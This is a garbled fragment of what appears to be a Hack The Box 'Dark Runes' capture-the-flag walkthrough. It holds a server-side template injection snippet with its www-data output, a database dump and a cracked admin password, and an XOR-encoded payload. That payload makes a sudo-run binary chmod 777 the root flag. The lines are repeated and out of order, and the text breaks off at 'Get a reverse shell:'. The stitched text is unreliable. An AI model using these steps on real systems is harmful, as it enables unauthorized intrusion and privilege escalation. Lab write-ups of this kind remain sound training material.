Htb Dark Runes !free! -

% with a=request a % endwith % uid=33(www-data) gid=33(www-data) groups=33(www-data)

Try re-creating the rune_decoder binary and see if you can find a different way to escalate without touching the root flag.

psql -U rune_walker -h localhost darkrunes -W Dump tables → users table has a row for admin with a (bcrypt). Crack with John or hashcat → admin:darkrun3s2023! htb dark runes

sudo /usr/local/bin/rune_decoder /var/runes/evil.rune Now read /root/root.txt directly.

Machine Difficulty: Medium Category: Web, Cryptography, Binary Exploitation, Linux % with a=request a % endwith % uid=33(www-data)

May your shell never drop, and your hashes always crack. 🔥

echo -n "RUNECMD:chmod 777 /root/root.txt" > payload python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune Move to /var/runes/evil.rune and run: Linux May your shell never drop

✅ RCE achieved. Get a reverse shell: